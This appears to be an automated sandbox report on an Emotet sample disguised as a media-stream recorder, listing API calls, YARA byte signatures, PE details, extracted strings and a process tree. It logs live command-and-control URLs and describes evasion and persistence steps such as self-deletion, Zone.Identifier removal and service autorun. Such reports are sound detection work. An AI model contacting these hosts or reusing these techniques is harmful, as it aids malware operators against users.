DynamicLoader: wbemcore.dll/Shutdown
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoDisconnectObject
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ADVAPI32.dll/RegDeleteKeyExW
DynamicLoader: kernel32.dll/RegDeleteValueW
DynamicLoader: WTSAPI32.dll/WTSQueryUserToken
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeSecurity
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: wmisvc.dll/ServiceMain
DynamicLoader: wmisvc.dll/SvchostPushServiceGlobals
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: sechost.dll/RegisterServiceCtrlHandlerExW
DynamicLoader: sechost.dll/SetServiceStatus
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/WmiOpenBlock
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: VSSAPI.DLL/CreateWriter
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ADVAPI32.dll/LookupAccountNameW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: samcli.dll/NetLocalGroupGetMembers
DynamicLoader: SAMLIB.dll/SamConnect
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: SAMLIB.dll/SamOpenDomain
DynamicLoader: SAMLIB.dll/SamLookupNamesInDomain
DynamicLoader: SAMLIB.dll/SamOpenAlias
DynamicLoader: SAMLIB.dll/SamFreeMemory
DynamicLoader: SAMLIB.dll/SamCloseHandle
DynamicLoader: SAMLIB.dll/SamGetMembersInAlias
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/StringFromCLSID
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/VariantToPropVariant
DynamicLoader: OLEAUT32.dll/
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
DynamicLoader: authZ.dll/AuthzInitializeObjectAccessAuditEvent2
DynamicLoader: authZ.dll/AuthzAccessCheck
DynamicLoader: authZ.dll/AuthzFreeAuditEvent
DynamicLoader: authZ.dll/AuthzFreeContext
DynamicLoader: authZ.dll/AuthzInitializeResourceManager
DynamicLoader: authZ.dll/AuthzFreeResourceManager
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingCreateW
DynamicLoader: RPCRT4.dll/RpcBindingBind
DynamicLoader: RPCRT4.dll/I_RpcMapWin32Status
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: kernel32.dll/RegSetValueExW
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: wmisvc.dll/IsImproperShutdownDetected
DynamicLoader: Wevtapi.dll/EvtRender
DynamicLoader: Wevtapi.dll/EvtNext
DynamicLoader: Wevtapi.dll/EvtClose
DynamicLoader: Wevtapi.dll/EvtQuery
DynamicLoader: Wevtapi.dll/EvtCreateRenderContext
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcBindingSetOption
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ole32.dll/CoCreateFreeThreadedMarshaler
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: KERNELBASE.dll/InitializeAcl
DynamicLoader: KERNELBASE.dll/AddAce
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: kernel32.dll/IsThreadAFiber
DynamicLoader: kernel32.dll/OpenProcessToken
DynamicLoader: KERNELBASE.dll/GetTokenInformation
DynamicLoader: KERNELBASE.dll/DuplicateTokenEx
DynamicLoader: KERNELBASE.dll/AdjustTokenPrivileges
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: KERNELBASE.dll/AllocateAndInitializeSid
DynamicLoader: KERNELBASE.dll/CheckTokenMembership
DynamicLoader: kernel32.dll/SetThreadToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ole32.dll/CLSIDFromString
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
DynamicLoader: authZ.dll/AuthzInitializeResourceManager
DynamicLoader: authZ.dll/AuthzInitializeContextFromSid
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
DynamicLoader: authZ.dll/AuthzAccessCheck
DynamicLoader: authZ.dll/AuthzFreeContext
DynamicLoader: authZ.dll/AuthzFreeResourceManager
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ole32.dll/CoGetCallContext
DynamicLoader: ole32.dll/CoImpersonateClient
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/CoRevertToSelf
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoSwitchCallContext
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegCreateKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/UuidFromStringW
DynamicLoader: radarrs.dll/WdiDiagnosticModuleMain
DynamicLoader: radarrs.dll/WdiHandleInstance
DynamicLoader: radarrs.dll/WdiGetDiagnosticModuleInterfaceVersion
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
Performs HTTP requests potentially not found in PCAP.
url: 125.99.61.162:7080/loadan/
CAPE extracted potentially suspicious content
ygg9ytft62s5ip.exe: Emotet Payload: 32-bit executable
ygg9ytft62s5ip.exe: [{u'strings': [u'{ 6A 13 68 01 00 01 00 FF 15 58 17 41 00 85 C0 }', u'{ 33 C0 21 05 5C 39 41 00 A3 58 39 41 00 39 05 90 03 41 00 74 18 40 A3 58 39 41 00 83 3C C5 90 03 41 00 00 75 F0 51 E8 FD BE FF FF 59 C3 }'], u'meta': {u'cape_type': u'Emotet Payload', u'description': u'Emotet Payload', u'author': u'kevoreilly'}, u'addresses': {u'snippet6': 21716L, u'snippet2': 5037L}, u'name': u'Emotet'}]
ygg9ytft62s5ip.exe: Emotet Payload
ygg9ytft62s5ip.exe: [{u'strings': [u'{ 6A 13 68 01 00 01 00 FF 15 58 17 41 00 85 C0 }', u'{ 33 C0 21 05 5C 39 41 00 A3 58 39 41 00 39 05 90 03 41 00 74 18 40 A3 58 39 41 00 83 3C C5 90 03 41 00 00 75 F0 51 E8 FD BE FF FF 59 C3 }'], u'meta': {u'cape_type': u'Emotet Payload', u'description': u'Emotet Payload', u'author': u'kevoreilly'}, u'addresses': {u'snippet6': 21716L, u'snippet2': 5037L}, u'name': u'Emotet'}]
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://91.83.93.105:8080/prov/guids/entries/merge/
suspicious_request: http://91.83.93.105:8080/window/raster/between/
suspicious_request: http://91.83.93.105:8080/balloon/balloon/
suspicious_request: http://91.83.93.105:8080/publish/
suspicious_request: http://91.83.93.105:8080/report/cookies/
suspicious_request: http://91.83.93.105:8080/prep/prov/enabled/merge/
suspicious_request: http://91.83.93.105:8080/loadan/
suspicious_request: http://91.83.93.105:8080/splash/splash/merge/
suspicious_request: http://91.83.93.105:8080/loadan/json/window/merge/
suspicious_request: http://91.83.93.105:8080/vermont/raster/scripts/merge/
suspicious_request: http://91.83.93.105:8080/window/ban/
suspicious_request: http://91.83.93.105:8080/window/merge/acquire/merge/
suspicious_request: http://91.83.93.105:8080/pnp/
Performs some HTTP requests
url: http://91.83.93.105:8080/prov/guids/entries/merge/
url: http://91.83.93.105:8080/window/raster/between/
url: http://91.83.93.105:8080/balloon/balloon/
url: http://91.83.93.105:8080/publish/
url: http://91.83.93.105:8080/report/cookies/
url: http://91.83.93.105:8080/prep/prov/enabled/merge/
url: http://91.83.93.105:8080/loadan/
url: http://91.83.93.105:8080/splash/splash/merge/
url: http://91.83.93.105:8080/loadan/json/window/merge/
url: http://91.83.93.105:8080/vermont/raster/scripts/merge/
url: http://91.83.93.105:8080/window/ban/
url: http://91.83.93.105:8080/window/merge/acquire/merge/
url: http://91.83.93.105:8080/pnp/
Deletes its original binary from disk
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\prepmspterm.exe:Zone.Identifier
Installs itself for autorun at Windows startup
service name: prepmspterm
service path: "C:\Windows\SysWOW64\prepmspterm.exe"
Installs itself for autorun at Windows startup
service name: prepmspterm
service path: "C:\Windows\SysWOW64\prepmspterm.exe"
Creates a hidden or system file
file: C:\Users\user\AppData\Local\Microsoft\Windows\Burn\Burn
CAPE detected the Emotet malware family
Creates a copy of itself
copy: C:\Windows\SysWOW64\prepmspterm.exe
Drops a binary and executes it
binary: C:\Windows\SysWOW64\prepmspterm.exe
Anomalous binary characteristics
anomaly: Actual checksum does not match that reported in PE header

Screenshots


Hosts

Direct IP Country Name
Y 94.183.71.206 [VT] Iran, Islamic Republic of
Y 91.83.93.105 [VT] Hungary
Y 125.99.61.162 [VT] India

DNS

No domains contacted.


Summary

PE Information

Image Base 0x00400000
Entry Point 0x00407dd3
Reported Checksum 0x0009e705
Actual Checksum 0x000a1768
Minimum OS Version 5.0
Compile Time 2019-10-06 18:27:14
Import Hash 8740bde339723d73ad60369c868b5940
Exported DLL Name MHMS.exe

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x000076e3 0x00007800 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.20
.rdata 0x00009000 0x000021bf 0x00002200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.35
.data 0x0000c000 0x000006c0 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 1.27
.rsrc 0x0000d000 0x0008e686 0x0008e800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.63

Overlay

Offset 0x00098800
Size 0x00000003

Imports

Library COMCTL32.dll:
0x409000 None
0x409004 ImageList_Add
0x409008 ImageList_Create
Library COMDLG32.dll:
0x409014 GetSaveFileNameA
Library WS2_32.dll:
0x409264 send
0x409268 socket
0x40926c htons
0x409270 setsockopt
0x409274 connect
0x409278 WSAStartup
0x40927c WSAGetLastError
0x409280 gethostname
0x409284 gethostbyname
0x409288 inet_ntoa
0x40928c recv
0x409290 WSACleanup
0x409294 closesocket
Library KERNEL32.dll:
0x40904c Sleep
0x409054 GetModuleFileNameA
0x409058 FindClose
0x40905c FindFirstFileA
0x409060 GetDriveTypeA
0x409070 GetModuleHandleA
0x409074 GlobalReAlloc
0x409078 GlobalUnlock
0x40907c GlobalLock
0x409080 GlobalAlloc
0x409084 InterlockedExchange
0x40908c GetCurrentProcessId
0x409090 GetCurrentThreadId
0x409094 GetTickCount
0x40909c IsDebuggerPresent
0x4090a8 GetCurrentProcess
0x4090ac TerminateProcess
0x4090b0 GetStartupInfoA
Library USER32.dll:
0x4091c0 RegisterClassExA
0x4091c4 LoadCursorA
0x4091c8 LoadIconA
0x4091cc SendMessageA
0x4091d0 EnableWindow
0x4091d4 CreateWindowExA
0x4091d8 GetWindowRect
0x4091dc DestroyWindow
0x4091e0 SetWindowPos
0x4091e4 GetCursorPos
0x4091e8 ReleaseDC
0x4091ec GetDC
0x4091f0 LoadBitmapA
0x4091f4 CreatePopupMenu
0x4091f8 AppendMenuA
0x4091fc TrackPopupMenu
0x409200 LoadImageA
0x409204 SetWindowRgn
0x409208 CreateDialogParamA
0x40920c SetCursor
0x409210 BeginPaint
0x409214 EndPaint
0x409218 SetCapture
0x40921c GetClientRect
0x409220 ReleaseCapture
0x409224 CallWindowProcA
0x409228 SetWindowLongA
0x40922c MessageBoxA
0x409230 GetDlgItem
0x409234 SetFocus
0x409238 DefWindowProcA
0x40923c PostQuitMessage
0x409240 GetMessageA
0x409244 TranslateMessage
0x409248 DispatchMessageA
0x40924c IsDialogMessageA
0x409250 LoadStringW
0x409254 ShowWindow
0x409258 GetDesktopWindow
0x40925c SetRect
Library GDI32.dll:
0x40901c GetStockObject
0x409020 CreateDIBSection
0x409024 GetPixel
0x409028 ExtCreateRegion
0x40902c CombineRgn
0x409030 DeleteObject
0x409034 GetObjectA
0x409038 CreateCompatibleDC
0x40903c SelectObject
0x409040 DeleteDC
0x409044 BitBlt
Library SHELL32.dll:
0x4091b8 ShellExecuteA
Library MSVCR90.dll:
0x4090cc _decode_pointer
0x4090d0 _onexit
0x4090d4 _lock
0x4090d8 __dllonexit
0x4090dc _unlock
0x4090e0 _invoke_watson
0x4090e4 ?terminate@@YAXXZ
0x4090e8 _crt_debugger_hook
0x4090ec __set_app_type
0x4090f0 _encode_pointer
0x4090f4 __p__fmode
0x4090f8 __p__commode
0x4090fc _adjust_fdiv
0x409100 __setusermatherr
0x409104 _configthreadlocale
0x409108 _initterm_e
0x40910c _initterm
0x409110 _acmdln
0x409114 exit
0x409118 _ismbblead
0x40911c _XcptFilter
0x409120 _exit
0x409124 _cexit
0x409128 __getmainargs
0x40912c _amsg_exit
0x409130 _beginthread
0x409134 fwrite
0x409138 fflush
0x40913c _flushall
0x409140 _endthread
0x409144 __CxxFrameHandler3
0x409148 isdigit
0x40914c feof
0x409150 fgets
0x409154 strncmp
0x409158 atoi
0x40915c fprintf
0x409160 fopen
0x409164 _controlfp_s
0x409168 _itoa
0x409170 _stricmp
0x409174 strstr
0x409178 _splitpath
0x40917c ??3@YAXPAX@Z
0x409180 sprintf
0x409184 ??2@YAPAXI@Z
0x409188 atol
0x40918c memset
0x409190 fclose
0x409194 strerror
0x409198 _errno
0x40919c isspace
0x4091a0 _difftime64
0x4091a4 _time64
0x4091a8 memcpy
0x4091ac _wtoi
0x4091b0 _wcslwr

Exports

Ordinal Address Name
1 0x4034e0 Run
.text
`.rdata
@.data
.rsrc
T$ Rj
D$(VPj
:t:="*
SUVWhzk
Whpi@
MHMS_Popup
MHMS_Main
Monkey Head Media Stream
bad allocation
%s%s%s
Item Count: %i
%s%s%s_%04i%s
config.ini
urlbookmarks
urlhistory.txt
help\
RECV_THROTTLE
RECV_MAX_BUFFER
TIMEOUT
WINSOCK
AGENT_NAME
TRACK_SEPERATION
WINDOW_ON_TOP
tooltips_class32
Host Unknown
Unspecified network error occurred!
Host not found!
Network subsystem is unavailable!
No route to host!
Host is unavailable!
Connection refused!
Connection timed out!
No buffer space available!
Connection reset by peer!
Software caused connection abort!
Network dropped connection on reset!
Network is unreachable!
Network is down!
Too many open sockets
Network Error:
%02d:%02d:%02d
StreamTitle='
Enter new bookmark information and click the 'Ok' button to save your information.
You must select an item to edit.
Update bookmark information and click the 'Ok' button to save your information.
Specify output filename:
*.mp3
All Files
Could not open help.chm
help.chm
Error! Failed to locate correct version of the Winsock DLL!
icy-notice2:
icy-notice1:
Content-Type:
icy-url:
icy-genre:
icy-name:
icy-br:
icy-metaint:
%s%sPartialTrack%s
%s%s%s%s
Failed to update bookmark!
You must select an item to delete.
Failed to delete list item!
Are you sure you wish to delete the "%s" item?
Are you sure you wish to delete the media stream URL history?
http://www.monkeyheadsoftware.com/default.asp?app=Y
You must specify a valid stream URL! ex, (http://www.somehost.com:8000/stream/1011)
You must specify a valid stream URL!
You must enter a stream name!
No bookmarks available.
You must select an item first.
A stream is currently being recorded. You must stop the current media stream before proceeding.
%s exists! Do you wish to overwrite this file?
%s exists. Do you wish to overwrite this file?
Invalid filepath! Ensure the specified directory exists!
You must specify a valid destination filename.
File:
Track:
Saved %iK Bytes in %s (hh:mm:ss)
Media stream stopped.
Connection Lost!
Failed to open MP3 file! Ensure all open media files are closed.
Specified number of recording minutes ellapsed.
Failed to open file " %s ". This file may be opened by another application.
Max number of bytes specified has been saved..
@ File Error! Ensure file is closed and check diskspace!
Display application information
Display help file
Application settings
Display bookmarks
Acquire media stream
Visit Monkey Head Software's Home Page!
Minimize window
Close Application
Stream acquisition cancelled!
Contact software provider if this issue persists.
Validate the specified URL or check your Internet connection.
Stream capture classes initialized..
Please wait.. Connecting to remote server..
Delete Bookmark
Edit Bookmark
Get Stream
Stream URL
Stream Name
http://www.monkeyheadsoftware.com?psc=Y
Status: Connecting to media server..
Failed to initialize application! Contact software prodiver if this condition persists!
Failed to load application configuration data! Check config.ini file! If your config file is corrupt, simply delete it and restart the application. The file will be recreated upon restart.
InitCommonControlsEx
ImageList_Add
ImageList_Create
COMCTL32.dll
GetSaveFileNameA
COMDLG32.dll
WS2_32.dll
GetModuleFileNameA
FindClose
FindFirstFileA
GetDriveTypeA
GetPrivateProfileStringA
GetPrivateProfileIntA
WritePrivateProfileStringA
GetModuleHandleA
GlobalReAlloc
GlobalUnlock
GlobalLock
GlobalAlloc
Sleep
KERNEL32.dll
RegisterClassExA
LoadCursorA
LoadIconA
SendMessageA
EnableWindow
CreateWindowExA
GetWindowRect
DestroyWindow
SetWindowPos
GetCursorPos
ReleaseDC
GetDC
SetRect
GetDesktopWindow
ShowWindow
LoadStringW
IsDialogMessageA
DispatchMessageA
TranslateMessage
GetMessageA
PostQuitMessage
DefWindowProcA
SetFocus
GetDlgItem
MessageBoxA
SetWindowLongA
CallWindowProcA
ReleaseCapture
GetClientRect
SetCapture
EndPaint
BeginPaint
SetCursor
CreateDialogParamA
SetWindowRgn
LoadImageA
TrackPopupMenu
AppendMenuA
CreatePopupMenu
LoadBitmapA
USER32.dll
BitBlt
DeleteDC
SelectObject
CreateCompatibleDC
GetObjectA
DeleteObject
CombineRgn
ExtCreateRegion
GetPixel
CreateDIBSection
GetStockObject
GDI32.dll
ShellExecuteA
SHELL32.dll
??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ
??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_WI@Z
??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ
MSVCP90.dll
strstr
_splitpath
??3@YAXPAX@Z
sprintf
??2@YAPAXI@Z
memset
fclose
strerror
_errno
isspace
_difftime64
_time64
memcpy
_wtoi
_wcslwr
fopen
fprintf
strncmp
fgets
isdigit
__CxxFrameHandler3
_endthread
_flushall
fflush
fwrite
_beginthread
MSVCR90.dll
_amsg_exit
__getmainargs
_cexit
_exit
_XcptFilter
_ismbblead
_acmdln
_initterm
_initterm_e
_configthreadlocale
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
_encode_pointer
__set_app_type
_crt_debugger_hook
?terminate@@YAXXZ
?_type_info_dtor_internal_method@type_info@@QAEXXZ
_unlock
__dllonexit
_lock
_onexit
_decode_pointer
_except_handler4_common
_invoke_watson
_controlfp_s
InterlockedExchange
InterlockedCompareExchange
GetStartupInfoA
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
_itoa
_stricmp
MHMS.exe
.?AVCGuiElement@@
.?AVtype_info@@
YY\\\`bbiiiib
&***Cf
N303Hj
" .25POTl
$1=<>;Uk
9@Q@BWn
M',CEREEYn
7HHSGGZo
'(CHHHHH^o
sHKKLV\^bbbem
cHRM
bRV.~
Q~)|6
~d4\-
oW Prd
ert^k
`0lZ?
N@@@
"4%oh
/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/P$P!D
</assembly>
MS Sans Serif
MS Sans Serif
Media stream &URL:
Destination File&path:
&Browse..
Max &Filesize (Mb):
msctls_updown32
Spin1
&Max Minutes:
msctls_updown32
Spin1
&Stop Stream
&Get Stream
Status: Idle
Stream &Information (Read Only):
SysAnimate32
Animate1
MS Sans Serif
SysListView32
List3
&Edit
&Delete
&Get Stream
Bookmark count: 0
MS Sans Serif
&Single MP3 file.
&Numbered files.
&Keep window on top of all other windows.
Clear Stream URL &History
&Cancel
&Apply
Track Seperation Settings
Miscellaneous Options
&Metadata files
You can create a single MP3 file with all tracks merged or create seperate MP3 files for each audio track received. Both the "Numbered files" and "Metadata files" options create individual MP3 files if metadata is available.
The "Numbered files" option creates files namd with a specified prefix and numbered suffix (ex. YourTitle_0001.mp3, YourTitle_0002.mp3, etc). The "Metadata files" options uses available metadata (track, artist, song, etc) to name received audio tracks.
MS Sans Serif
Stream &Name
Stream &URL:
&Cancel
Static
VS_VERSION_INFO
StringFileInfo
040904b0
Comments
CompanyName
Monkey Head Software
FileDescription
Monkey Head Media Stream
FileVersion
1, 0, 0, 1
InternalName
LegalCopyright
2003
LegalTrademarks
OriginalFilename
MHMS.exe
PrivateBuild
ProductName
Monkey Head Media Stream
ProductVersion
1, 0, 0, 1
SpecialBuild
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


ygg9ytft62s5ip.exe, PID: 1964, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
Command Line: "C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe"
ygg9ytft62s5ip.exe, PID: 1436, Parent PID: 1964
Full Path: C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
Command Line: --400e05c0
explorer.exe, PID: 1632, Parent PID: 1496
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE
services.exe, PID: 460, Parent PID: 372
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
prepmspterm.exe, PID: 2128, Parent PID: 460
Full Path: C:\Windows\SysWOW64\prepmspterm.exe
Command Line: "C:\Windows\SysWOW64\prepmspterm.exe"
prepmspterm.exe, PID: 2636, Parent PID: 2128
Full Path: C:\Windows\SysWOW64\prepmspterm.exe
Command Line: --525413bf
svchost.exe, PID: 1788, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\System32\svchost.exe -k WerSvcGroup
WerFault.exe, PID: 2108, Parent PID: 1788
Full Path: C:\Windows\sysnative\WerFault.exe
Command Line: C:\Windows\system32\WerFault.exe -u -p 1632 -s 3272
WerFault.exe, PID: 416, Parent PID: 1788
Full Path: C:\Windows\sysnative\WerFault.exe
Command Line: C:\Windows\system32\WerFault.exe -u -p 1632 -s 3060
explorer.exe, PID: 2916, Parent PID: 400
Full Path: C:\Windows\explorer.exe
Command Line: explorer.exe
svchost.exe, PID: 816, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe -k netsvcs
svchost.exe, PID: 564, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe -k DcomLaunch
svchost.exe, PID: 1544, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe -k netsvcs
WmiPrvSE.exe, PID: 552, Parent PID: 564
